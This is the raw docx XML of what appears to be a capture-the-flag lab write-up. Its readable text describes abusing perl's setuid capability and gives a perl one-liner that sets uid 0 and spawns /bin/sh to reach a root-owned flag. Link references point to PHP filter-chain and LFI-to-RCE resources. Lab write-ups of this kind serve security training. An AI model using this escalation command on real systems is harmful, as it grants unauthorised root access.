        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">setuid </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">capability. This indicates that </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">perl </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">can be executed with elevated privileges, allowing commands to run with higher permissions than the current user.</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04900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="43"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use the command: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";' </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to escalate privileges on the system, thereby allowing access to the final flag located in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/root </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">directory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003B">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br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId36">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://gtfobins.github.io/gtfobins/perl/#capabilities</w:t>
        </w:r>
      </w:hyperlink>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1244600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="63"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headerReference r:id="rId38" w:type="default"/>
      <w:headerReference r:id="rId39" w:type="first"/>
      <w:headerReference r:id="rId40" w:type="even"/>
      <w:footerReference r:id="rId41" w:type="default"/>
      <w:footerReference r:id="rId42" w:type="first"/>
      <w:footerReference r:id="rId43"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BM Plex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0">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o" w:id="2"/>
    <w:bookmarkEnd w:id="2"/>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-866771</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>95250</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="719138" cy="232221"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr id="61" name="image23.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image23.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1">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0</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="7820025" cy="10085729"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr id="44" name="image19.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image19.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-339720</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>5776596</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6677025" cy="3000910"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="40"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Reader</w:t>
                          </w:r>
                        </w:p>
                        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000">
                          <w:pPr>
                            <w:spacing w:after="120" w:before="480" w:line="275.9999942779541"/>
                            <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                            <w:jc w:val="left"/>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-339720</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>5776596</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6677025" cy="3000910"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="40" name="image28.png"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr id="0" name="image28.png"/>
                      <pic:cNvPicPr preferRelativeResize="0"/>
                    </pic:nvPicPr>
                    <pic:blipFill>
                      <a:blip r:embed="rId2"/>
                      <a:srcRect/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </pic:blipFill>
                    <pic:spPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="6677025" cy="300091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3.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.pn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3.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.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8.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/synacktiv/php_filter_chain_generator/blob/main/php_filter_chain_generator.py" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@sundaeGAN/php-wrapper-and-lfi2rce-81c536ef7a06"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png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gtfobins.github.io/gtfobins/perl/#capabilities" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-regular.ttf"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-bold.ttf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-italic.ttf"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSans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3.jpg"/><Relationship Id="rId2"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28.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9QRBRzNws7fgZcSrXqbdgQyPCw==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLjZnanl5Znd5aXUwMjIOaC4xNzVmNWNzOTR6MG84AHIhMV9QYVhLcFY1ZGlsVmI1VDREQVhVbTEtMEl6OUNBRktu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